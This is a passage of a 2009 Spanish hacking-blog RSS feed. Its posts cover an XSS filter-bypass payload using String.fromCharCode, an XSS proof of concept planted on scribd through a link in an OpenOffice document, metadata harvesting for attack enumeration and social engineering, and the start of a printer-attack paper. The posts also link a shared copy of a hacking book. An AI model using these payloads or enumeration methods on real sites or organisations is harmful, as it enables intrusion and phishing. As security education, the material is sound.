bypassear los filtros impuestos en algunos casos que nos dificultan la tarea.&lt;br /&gt;&lt;br /&gt;Revisando la pagina de &lt;a href="http://www.owasp.org/"&gt;OWASP&lt;/a&gt; (la cual visito diariamente) me encontré con este documento:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet"&gt;XSS (Cross Site Scripting) Prevention Cheat Sheet&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Cuando nos encontramos con el problema de querer protegernos contra algunos ataques que pueden sufrir nuestras webs normalmente la solución a estos suele ser más tediosa que la simplicidad de los ataques. Al igual que los ataques que pueden ir desde un simple alert(5), hasta ataques más elaborados que intenten bypassear algún tipo de filtro: onmouseover="alert(String.fromCharCode(70,117,99,107,32,105,71,111,111,103,108,101));" . De esta misma forma cuando queremos defendernos de estos ataques disponemos desde soluciones simples y rápidas como sanear nuestra variable simplemente con una función en PHP como &lt;a href="http://us3.php.net/manual/es/function.htmlspecialchars.php"&gt;htmlspecialchars&lt;/a&gt; hasta sistemas más complejos como filtros propios en JavaScript, alguna libreria de filtrado como &lt;a href="http://htmlpurifier.org/"&gt;HTMLPurifier&lt;/a&gt; o algun &lt;a href="http://demo.php-ids.org/"&gt;Web IDS&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;La idea de este post es la misma que la del anterior post de cheatsheet, recolectar varias maneras de prevenirnos de este tipo de ataque, compararlas y seleccionar cual es la más efectiva y segura.&lt;br /&gt;&lt;br /&gt;Saludos y espero que participen...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-1232940887032607739?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=Y8xk4RTFzwA:kN8kGdgT_Zg:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/Y8xk4RTFzwA" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-04-20T17:01:22.769+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/04/xss-cross-site-scripting-prevention.html</feedburner:origLink></item><item><title>Hacking RSS and Atom (607 páginas)</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/xo5sufRf-Qc/hacking-rss-and-atom-607-paginas.html</link><category>Libros</category><category>White Papers</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Fri, 03 Apr 2009 22:37:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-5480640792021287794</guid><description>&lt;h1&gt;Hacking RSS and Atom&lt;/h1&gt;&lt;center&gt;&lt;img src="http://ecx.images-amazon.com/images/I/51G8ZJFXN5L.jpg"&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;  Mi última adquisición, mi lectura para descansar de las tardes de estudio que me esperan XDD.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://hates.home.anadolu.edu.tr/books/Computer/Hacking/Hacking%20RSS%20And%20Atom%20%282005%29.pdf"&gt;DESCARGA&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;font color=red&gt;&lt;b&gt;Que quede claro que símplemente he recolectado el link de internet, YO NO HE SUBIDO ESTE ARCHIVO &lt;/font&gt;(aclaro, que despues los del Copyright se nos ponen farrucos XD)&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-5480640792021287794?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=xo5sufRf-Qc:5dfp1iMlqRs:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/xo5sufRf-Qc" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-04-04T07:44:57.337+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><media:content url="http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~5/CC7b4Go0o4U/Hacking%20RSS%20And%20Atom%20%282005%29.pdf" fileSize="15665421" type="application/pdf" /><itunes:explicit>no</itunes:explicit><itunes:subtitle>Hacking RSS and Atom Mi última adquisición, mi lectura para descansar de las tardes de estudio que me esperan XDD. DESCARGA Que quede claro que símplemente he recolectado el link de internet, YO NO HE SUBIDO ESTE ARCHIVO (aclaro, que despues los del Copyr</itunes:subtitle><itunes:author>Copyright: "Vengador de las Sombras"</itunes:author><itunes:summary>Hacking RSS and Atom Mi última adquisición, mi lectura para descansar de las tardes de estudio que me esperan XDD. DESCARGA Que quede claro que símplemente he recolectado el link de internet, YO NO HE SUBIDO ESTE ARCHIVO (aclaro, que despues los del Copyright se nos ponen farrucos XD)</itunes:summary><itunes:keywords>Hack,hacking,hackers</itunes:keywords><feedburner:origLink>http://0verl0ad.blogspot.com/2009/04/hacking-rss-and-atom-607-paginas.html</feedburner:origLink><enclosure url="http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~5/CC7b4Go0o4U/Hacking%20RSS%20And%20Atom%20%282005%29.pdf" length="15665421" type="application/pdf" /><feedburner:origEnclosureLink>http://hates.home.anadolu.edu.tr/books/Computer/Hacking/Hacking%20RSS%20And%20Atom%20%282005%29.pdf</feedburner:origEnclosureLink></item><item><title>XSS a través de OpenOffice</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/S68xxtbooKQ/xss-traves-de-openoffice.html</link><category>XSS</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Fri, 03 Apr 2009 11:25:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-1096547711766566921</guid><description>Saludos a todos!&lt;br /&gt;&lt;br /&gt;Como es habitual, antes de empezar con la parte técnica, os voy a contar un poco de mi vida... Bien, esta noche voy a volver a las desérticas tierras de Almería para poder disfrutar de estas vacaciones...  en esta semana que viene, continuaré con la parte de Metadatos que se borró (archivos .XLS), ya que en este ordenador no poseo MS Office para poder poner imágenes molonas y todos esos rollos, por lo que a esperar os toca :P (la culpa la tiene Lix por decirme que me ponga Fedora 10 XD). Por otra parte, algo interesante es que probablemente se nos una un compañero más en este patiburrillo que tengo por blog... así que ya podríamos decir que vamos a ser algo parecido a un blog serio.&lt;br /&gt;&lt;br /&gt;Y hasta aquí el avance de noticias, ahora viene la parte técnica&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;==========================&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt; Leyendo por el blog del &lt;a href="http://elladodelmal.blogspot.com/"&gt;Doctor Maligno&lt;/a&gt; me fijé en esto de colgar los PowerPoints de las presentaciones en una web para no tener que descargarlo y poder visualizarlo. Me pareció una cosa bastante curiosa la verdad, y como todo buen curioso me dispuse a leer un poco de cómo funcionaba este sistema.&lt;br /&gt;&lt;br /&gt;La verdad es que ví varias variantes utilizando scripts en PHP, entre los cuales destacaban la conversión de los archivos en .pdf y en .html. Y es al leer sobre este último tipo de conversión donde se me planteó una pequeña idea que me atrajo bastante la verdad... y consiste en introducir código malicioso en el documento para que el .html generado tuviera un link que apuntase a una sentencia JavaScript...&lt;br /&gt;&lt;br /&gt;Entonces me puse mano a la obra, abrí OpenOffice inserté un link con una pequeña sentencia javascript a modo de prueba de concepto:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://img408.imageshack.us/img408/4011/pantallazosir.png"&gt;&lt;img src="http://img408.imageshack.us/img408/4011/pantallazosir.png" height="500" width="600" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Despues lo guardé primero como .doc y despues lo pasé a .html. Resultado: al cliclar sobre el link se me ejecutaba el alert. Bien... esto en la teoría debería de funcionar de 10... El caso es que quise probar "in situ" si mi teoría se cumpliría... y me fui hacia scribd.com, web bastante conocida y usada para subir cosas. Así que me encaminé a subir mi prueba de concepto haber que pasaba, aquí teneis el resultado: &lt;a href="http://www.scribd.com/doc/13931124/PoC"&gt;Prueba de Concepto&lt;/a&gt; , si dejais el ratón sobre link, observareis que no indica hacia donde apunta, por lo que no se puede predecir la hacia donde donde apunta el link a simple vista. Si clickais, podreis comprobar en vuestras propias carnes cómo se ejecuta un alert que contiene vuestra galletita :D.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Si bien, en el caso la aplicación está en Flash... el resultado era el esperado. Podemos decir que la vulnerabilidad de esta aplicación web reside en dos puntos importantes: falta de filtro, y ocultación de información.&lt;br /&gt;&lt;br /&gt;En el primer caso, de existir algún tipo de filtrado para evitar la ejecución de código javascript, podríamos evitar perfectamente que un usuario al querer seguir el link caiga en nuestras redes. Por otra parte, el hecho de que no se muestre el target del link, hace que también podamos usarlo con otros menesteres, como por ejemplo algún tipo de phising.&lt;br /&gt;&lt;br /&gt;En fin... que revisando información de esta clase de vulnerabilidad, llegué hasta un paper de Aditya K Sood (de SecNiche.org) donde ya hablaba de la utilización de aplicaciones word como vector de ejecución de código javascript y también sobre la inclusión de frames para realizar CSRF. Aquís os dejo el paper:&lt;br /&gt;&lt;br /&gt;http://www.secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-1096547711766566921?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=S68xxtbooKQ:X5gWPqU3VY0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/S68xxtbooKQ" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-04-03T22:07:51.422+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/04/xss-traves-de-openoffice.html</feedburner:origLink></item><item><title>Nueva incorporación al blog</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/ikkBPhu4HWQ/nueva-incorporacion-al-blog.html</link><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Tue, 31 Mar 2009 22:42:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-771775521192238232</guid><description>Saludos queridos lectores,&lt;br /&gt;&lt;br /&gt;    Informamos de que un nuevo miembro se nos ha unido a este proyecto/gilipollez de blog que teníamos Mace y yo. En esta ocasión le ha tocado a Seth, uno de esos tipos con los que he es agradable de vez en cuando hablar sobre vulnes, y que siempre te abre conversación con un interesante link... Por supuesto no tanto como los de Lix, XD.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   De todas formas, para aquellos que siguen el blog simplemente deciros que por culpa de unos ataques que ha sufrido en su blog, va a empezar a publicar por estos lares... así qeu ser buenos con él y leed lo que ponga... Y si no os gusta te largas por donde has venido, o como rezaba en XD Blog "Podés irte a defecar".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Sin más que decir me despido, próximas publicaciones desde las desérticas tierras almerienses... ¡¡Que DioX nos coja confesados!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-771775521192238232?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=ikkBPhu4HWQ:5-dE6TLgxu4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/ikkBPhu4HWQ" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-04-01T07:49:04.046+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/04/nueva-incorporacion-al-blog.html</feedburner:origLink></item><item><title>Metadatos II: Destripando .DOC</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/xMLYPjruYjU/metadatos-ii-destripando-doc.html</link><category>Enumeración</category><category>Metadatos</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Mon, 16 Mar 2009 06:13:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-9089314774557176660</guid><description>Saludos!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      Ya estamos aquí de nuevo para darle caña a esto de los metadatos. Hoy vamos a hablar un poco sobre los metadatos en documentos word y hojas de cálculo excel, porque creo que son los tipos de archivos ofimáticos que más se pueden exponer, en el sentido de que son los que más se cuelgan en las webs para su descarga.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;     Como ya dije con anterioridad, existen múltiples herramientas que nos sacan los metadatos en un plis plás, pero yo lo que pretendo con estos pocos artículos (y con el que voy a hacer con Lix) es enseñaros qué son los metadatos, como podemos verlos, y daros unas pistas de cómo podeis codear vosotros una herramienta que se adapte a vuestras necesidades.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;         Los metadatos, como ya dijimos, contienen distintas informaciones acerca de nuestro documento, ya sean datos de la manipulación del documento, estructura, o descripciones sobre el contenido del mismo. En el caso de los archivos ofimáticos creado con MS-Office, esta información se incorpora de forma automática a nuestro propio archivo, es decir, que en nuestro documento tenemos a parte de nuestro texto, esta información. Como es lógico, si no la eliminamos, cualquier persona a la cual le suministremos nuestro documento podrá analizarlo y extraer datos de cierta relevancia sobre nosotros.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      La forma de extraer estos datos es múltiple, desde simplemente abrir el documento con un editor hexa y buscar información, hasta sacar objetos OLE (como ejemplo el script que hice en el artículo &lt;a href="http://0verl0ad.blogspot.com/2009/03/metadatos-i-nociones-basicas.html"&gt;Metadata I: Nociones básicas&lt;/a&gt; ). Otra opción puede ser pasar el archivo a otro formato... en el caso de .doc a .rtf (Rich Text Format) donde podremos ver mejor los metadatos....&lt;br /&gt;&lt;br /&gt;     El caso es que de primeras, para observar que esto de los metadatos es algo real, coged un editor hexadecimal y abrid cualquier documento Word que tengais a mano:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_uXtiiCW6OCQ/Sb5WEbN2UjI/AAAAAAAAAB0/Q_QdKqJfEQU/s1600-h/Dibujo.bmp"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 200px;" src="http://4.bp.blogspot.com/_uXtiiCW6OCQ/Sb5WEbN2UjI/AAAAAAAAAB0/Q_QdKqJfEQU/s1600-h/Dibujo.bmp" alt="" id="BLOGGER_PHOTO_ID_5313781057872904242" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;     Si buscais un poquito podreis encontrar cosas como esta, donde podemos ver el nombre de usuario y el programa creador del documento. Si seguis viendo encontrareis otras cosas, en mi caso, puse un link a un recurso compartido y si observamos podemos encontrar el link:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_uXtiiCW6OCQ/Sb5Xt_C2wDI/AAAAAAAAAB8/sBN1ASVqy3w/s1600-h/Dibujo.bmp"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 200px;" src="http://2.bp.blogspot.com/_uXtiiCW6OCQ/Sb5Xt_C2wDI/AAAAAAAAAB8/sBN1ASVqy3w/s320/Dibujo.bmp" alt="" id="BLOGGER_PHOTO_ID_5313781057872904242" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;       Quedaros con eso de PID_HLINKS, ya hablaremos de eso más adelante. Si os fijais también podeis encontrar la compañía (Dark). Como veis aparece una cosa interesante como puede ser \\maquina003\PoC\ejemplo C3LL  ... sería una cosa bastante interesante dar con algo como esto :D&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Tras este primer vistazo, podemos entender porqué son importantes estos metadatos. Podemos llegar a esquematizar la estructura interna de una organización a partir de las rutas relativas, los dominios internos, las rutas de las imagenes que haya linkeadas, las impresoras externas; y además también podemos saber algunos software que usan, el tipo de impresora, etc... lo que si encontramos algo sobre lo que haya ya publicado en algun Bugtraq vulnerabilidades... tenemos la mitad del camino hecho.&lt;br /&gt;&lt;br /&gt;  A parte, también podemos sacar patrones de conductas y datos personales (nombres y apellidos, correo electrónicos, etc.) muy útiles a la hora de aplicar un poco de ingeniería social y de saber, por ejemplo, qué clase de permisos tiene cada usuario.&lt;br /&gt;&lt;br /&gt; Bien, pero aún podemos extraer más datos. Al exportar un archivo .doc sucio (es decir, sin haber limpiado los metadatos) a formato .rtf (Rich Text Format), y abrirlo con un block de notas optendremos una marañana de datos... entre los cuales encontraremos nuestros queridísimos metadatos:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; Por si alguien no sabe como pasar a .rtf, simplemente abre el documento word, dale a guardar como y selecciones el formato RTF. Bien, si nadais entre ese cúmulo de caracteres sin sentido aparente (y sólo aparente) encontrareis las mísmas cosas que antes... pero si os fijais más aún y comprobais con otros documentos... vereis que hay una serie de coincidencias, a partir de las cuales podrás sacar datos intereantes:&lt;br /&gt;&lt;br /&gt;-Generator: es el programa que ha generado el documento (EJ: {\*\generator Microsoft Word 11.0.0000;} )&lt;br /&gt;-Author: El usuario que creo el archivo (EJ:{\author usuario})&lt;br /&gt;-Company: Compañía (EJ: {\*\company Dark})&lt;br /&gt;-&lt;span class="body"&gt;Revtbl: Usuarios que han creado/editado el archivo&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   Y despues hay otra serie de datos... tan sólo hechad un vistazo por ahí.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;(Continuará)&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-9089314774557176660?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=xMLYPjruYjU:_jU7154p_zQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/xMLYPjruYjU" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-03-16T16:00:19.372+01:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/03/metadatos-ii-destripando-doc.html</feedburner:origLink></item><item><title>Metadatos I: Nociones básicas</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/WkexENruits/metadatos-i-nociones-basicas.html</link><category>Enumeración</category><category>Metadatos</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Sat, 14 Mar 2009 18:47:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-2034165443851525498</guid><description>&lt;style&gt;code {color:lime;}&lt;/style&gt;Saludos lectores!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      Antes de empezar quisiera pedir perdón por no haber posteado en estos últimos días, pero lo primero es la vida real y despues la virtual; y en este caso me ha tocado tomarme unos días para ver qué hacía con mi vida...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      Dejando de lado mi descuido reciente en la publicación del blog, hoy vamos a hablar de los metadatos. Sí, ya sé que tengo pendiente lo de CSS Attacks, pero me han dicho "POstea algo rápido esta noche", y pss aprovechando que estaba con Lix hablando me he decidido a postear sobre este tema.&lt;br /&gt;&lt;br /&gt;      La idea ya me rondaba hacía tiempo... y entre el artículo sobre enumeración que voy a hacer para CPH (y por supuesto para el blog :P), las lecturas del blog de &lt;a href="http://elladodelmal.blogspot.com"&gt;Chema Alonso&lt;/a&gt; &lt;span style="text-decoration: underline;"&gt;&lt;/span&gt;(que por cierto no me van a dejar asistir a una charla suya en la USAL, en unas jornadas de puertas abiertas... que de puertas abiertas los cojones, he ido a informarme y por estar matriculado en  Biología me han dicho que no puedo...), y en último lugar el próximo proyecto que vamos a comenzar Lix y yo (esperemos que salga algo tan interesante como lo fue en su momento "&lt;a href="http://seth.inkt.fdchost.com/manuales/bugs/HTTP_al_Descubierto_by_Sknight___Vengador_de_las_sombras.pdf"&gt;HTTP al descubierto&lt;/a&gt;") sobre metadatos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Empezaremos desde 0 para aquellos que no tienen ni idea de lo que son Metadatos. Son datos que aparecen dentro de un archivo (sea de las características que sea: .html, .doc, .xls, .pdf, .jpeg...) y cuyo contenido informa del propio archivo. Estas informaciones son variadas, y pueden abarcar desde el autor o el programa con el que si hizo el archivo, hasta impresoras remotas instaladas en nuestra red, pasando por rutas locales... etc.&lt;br /&gt;&lt;br /&gt;   Para aquellos que alguna vez se han codeado una web, conocerán los elementos html conocidos como "meta". Estos elementos de primeras pueden parecer que no sirven, pero hay aplicaciones (como los buscadores) que extraen algunas informaciones de estos elementos. Algunas cosas que se suelen poner en los meta de la cabecera del documento son el autor, la descripción de la página y alguna otra información trivial, como correo de contacto.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  En esta serie de artículos nos vamos a centrar en el trabajo de archivos de caracter ofimático y de imagen, ya que son los más difundidos sin tener cuidado y además hay más posibilidad de encontrar "algo".&lt;br /&gt;&lt;br /&gt;  Ya sabemos lo que son los metadatos, y te preguntarás para qué queremos conocerlos. Tranquilo, aunque al principio probablemente te parecerá que no son interesantes, a la larga comprenderás la importancia que tienen. Básicamente los vamos a emplear en una de las etapas que comprende cualquier ataque a una organización, la enumeración. En esta etapa lo que se hace es recabar todas las informaciones relevantes, como servicios que corren, puertos abiertos, versiones de aplicaciones, OS, nombres de usuario, estructura de la red interna, etc...&lt;br /&gt;&lt;br /&gt;  Si analizamos los metadatos de todos los archivos ofimáticos que hay colgados en la web de alguna organización interesante, seguro, seguro que obtenemos informaciones realmente jugosas.  En "El Arte de la Intrusión" (el artículo para CPH) aparecerán ejemplos descargables para practicar todo estoy comprobar en nuestro ordenador como podemos llegar a sacar cosas interesantes.&lt;br /&gt;&lt;br /&gt;   Mi intención es publicar primero esta introducción, mañana o pasado hablar sobre los metadatos en aplicaciones MS-Office, despues OpenOffice y por último poner unas cuantas herramientas para que tengais.&lt;br /&gt;&lt;br /&gt;  Para abrir boca, vamos a usar un pequeño script codeado en perl que usa Win32::OLE para sacar algunos datos. En nuestro caso, lo único interesante con lo que vamos a encontrarnos es con el autor... ya que en la mayoría de las ocasiones coincide con el nombre de la cuenta de usuario que creó ese archivo, por lo que es algo importante:&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;#########DataFoS.pl /Ejemplo nº 1#########&lt;br /&gt;# Codex by The X-C3LL                    #&lt;br /&gt;# Blog: http://0verl0ad.blogspot.com/    #&lt;br /&gt;# Ejemplo de extractor de datos básicos  #&lt;br /&gt;#      "El Arte de la Enumeración        #&lt;br /&gt;#                                        #&lt;br /&gt;############Flaming Our Skills############&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#Declaramos los módulos a usar. Usaremos Win32::OLE para interactuar (la usaremos sobre todo&lt;br /&gt;#Cuando analicemos archivos de MS-Office&lt;br /&gt;&lt;br /&gt;use strict;&lt;br /&gt;use warnings;&lt;br /&gt;use Win32::OLE;&lt;br /&gt;&lt;br /&gt;if (!$ARGV[1]){&lt;br /&gt;exit();&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;#Seteamos las variables con las que vamos a trabajar&lt;br /&gt;my $ruta = $ARGV[0];&lt;br /&gt;my $arch = $ARGV[1];&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;my $shell  = Win32::OLE-&gt;new("Shell.Application") || die;&lt;br /&gt;my $folder = $shell-&gt;NameSpace($ruta) || die;&lt;br /&gt;my $file   = $folder-&gt;ParseName($arch) || die;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#Montamos un array con los 34 campos que contienen info&lt;br /&gt;my @info = ("Name","Size","Type","Date Modified","Date Create", "Date Accessed", "Attributes","Status", "Owner", "Author", "Title", "Subject", "Category", "Pages", "Comments", "Copyright", "Artist", "Album Title","Year", "Track Number", "Genre", "Duration", "Bit Rate", "Protected", "Camera Model", "Date Picture Taken", "Dimensions", "Empty", "Empty", "Empty", "Company", "Description", "File Version", "Product Name", "Product Version");&lt;br /&gt;&lt;br /&gt;#Creamos un bucle while para sacar todos los campos&lt;br /&gt;#http://www.microsoft.com/technet/scriptcenter/guide/sas_fil_lunl.mspx?mfr=true&lt;br /&gt;&lt;br /&gt;#Con un bucle mostramos la info&lt;br /&gt;my $count = 0;&lt;br /&gt;foreach my $campo (@info){&lt;br /&gt;my $data = $folder-&gt;GetDetailsOf($file, $count);&lt;br /&gt;print $campo." : ".$data."\n";&lt;br /&gt;$count++;&lt;br /&gt;}&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;El code lo he hecho en 10 minutos, así que no me he preocupado de que comprobase las extensiones, por lo que muestra todos los campos, y lógicamente los que son sólo para archivos multimedia (como canciones) van a estar vacíos.&lt;br /&gt;&lt;br /&gt;Reitero que esto es para abrir boca sólo y porque me han pedido que postease algo, ya mañana o pasado empezamos con lo interesante!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-2034165443851525498?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=WkexENruits:IX48DY7enAQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/WkexENruits" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-03-15T03:27:06.202+01:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/03/metadatos-i-nociones-basicas.html</feedburner:origLink></item><item><title>XSP: Cross Site Printing</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/PQh4u6YaKEo/xsp-cross-site-printing.html</link><category>Otras Vulnerabilidades</category><category>XSS</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Fri, 20 Feb 2009 14:10:00 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-7171754811602456864</guid><description>&lt;style&gt;code{ color: lime;}&lt;/style&gt;Recien acabo de terminar este pequeño paper. Estoy esperando a que alguien le haga un mirror (tengo por ahí el PDF, si alguien quiere subirlo avisadme).&lt;br /&gt;&lt;br /&gt;Edito: he subido el paper a milw0rm-&gt; &lt;a href="http://www.milw0rm.com/papers/294"&gt;Cross Site Printing&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;==============================================================&lt;br /&gt;./0x00 Introducción al tema&lt;br /&gt;./0x01 Conceptos básicos&lt;br /&gt;./0x02 Buscando impresoras&lt;br /&gt;./0x03 El arte del ASCII&lt;br /&gt;./0x04 PostScript: controlando la impresión&lt;br /&gt;./0x05 Conclusión&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./0x00 Introducción al tema&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El tema que venimos a tratar en este pequeño paper es la posibilidad desde el&lt;br /&gt;exterior (véase desde una web, por ejemplo) realizar un “ataque” (entrecomillémoslo)&lt;br /&gt;hacia las impresoras que tenemos en 